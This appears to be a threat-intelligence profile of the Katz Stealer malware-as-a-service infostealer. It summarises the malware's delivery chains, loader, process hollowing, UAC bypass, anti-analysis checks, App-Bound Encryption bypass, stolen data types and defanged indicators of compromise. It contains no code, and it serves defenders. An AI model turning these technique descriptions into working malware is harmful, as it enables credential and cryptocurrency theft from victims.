Katz Stealer

Katz Stealer is an information-stealing malware family operated as a Malware-as-a-Service (MaaS) platform and launched in early 2025. It was advertised by the user “katzadmin” on BreachForums on April 13, 2025, with later advertisements on exploit[.]in and xss[.]is, and was also marketed via Telegram and Discord. It is described as a feature-rich infostealer with a web-based panel for generating payloads and managing stolen data.

Observed delivery commonly uses phishing emails or trojanized downloads. Reported infection chains include malicious .gz, ZIP, or RAR archives containing obfuscated JavaScript or VBS droppers that launch PowerShell. The PowerShell stage retrieves steganographically embedded payload data from image files, decodes it in memory, and may use a .NET loader stage. Katz Stealer has also been delivered by PhantomVAI Loader, formerly referred to as Katz Stealer Loader and also known as VMDetectLoader/VMDetector Loader. PhantomVAI is a C#/.NET loader that performs VM checks, establishes persistence, downloads a final payload from a supplied URL, and injects it into legitimate processes using process hollowing; Unit 42 observed it most commonly using MSBuild.exe, while other reporting described injection into RegAsm.exe or calc.exe/calc64.exe depending on campaign. Some campaigns also used cmstp.exe for UAC bypass and scheduled tasks or Run keys for persistence.

Katz Stealer includes anti-analysis and geofencing behavior. It checks locale, keyboard layout, and default language settings and stops execution if it detects CIS-related country codes or languages. Reported anti-analysis checks include BIOS and system artifact inspection for VirtualBox and VMware, as well as checks on resolution and uptime.

Its collection scope is broad. High-confidence reporting states it steals browser credentials and browser data, including passwords, cookies, session tokens, autofill data, and stored credit card/CVV data, from Chrome, Edge, Brave, Firefox, and other Chromium- and Gecko-based browsers. It targets cryptocurrency wallets and browser wallet extensions, including MetaMask, Phantom, Binance, Exodus, Coinomi, Dash, Dogecoin, Litecoin, Monero, Bitcoin, and Ethereum-related assets. It also steals Telegram, Discord, Steam and other game-related data, email client data, FTP client data, VPN data and credentials, Wi-Fi credentials, operating system information, screenshots, clipboard contents, and in some reporting audio/video capture. Firefox artifacts such as logins.json and key4.db are specifically targeted.

Multiple sources state Katz Stealer can bypass Chromium’s Application Bound Encryption protections by injecting into headless browser processes and using the browser or OS cryptographic context to decrypt protected secrets. Reported artifacts include writing a DLL to %temp% for browser injection and storing decrypted browser key material as text files such as decrypted_chrome_key.txt under %APPDATA%.

Command-and-control communications are described as HTTP/HTTPS-based with hardcoded C2 IPs per instance, continuous beaconing, and chunked exfiltration for larger data. Reported Katz Stealer-related infrastructure includes domains katz-panel[.]com, katz-stealer[.]com, katzstealer[.]com, twist2katz[.]com, and Zxczxczxczxc.twist2katz[.]com, and IPs 172.67.146[.]103, 185.107.74[.]40, 195.182.25[.]71, 31.177.109[.]39, and 80.64.18[.]219. Reported operator-associated handles include Katzadmin, KatzStealer, @katzst, @katzcontact, and @katzadmin, plus qTOX ID 375AB62BD333F80905E612DB71BEE06660C40F00AAF393FD7F8605DF5761E47670B6578C9410.

Katz Stealer has been observed in campaigns targeting organizations worldwide across sectors including manufacturing, education, utilities, technology, healthcare, information, and government, as well as individuals. It has also been noted in campaigns targeting VPN credentials and crypto assets. Reporting describes broad criminal adoption due to its ease of use, customizable features, credential theft capability, and modern evasion and anti-analysis features.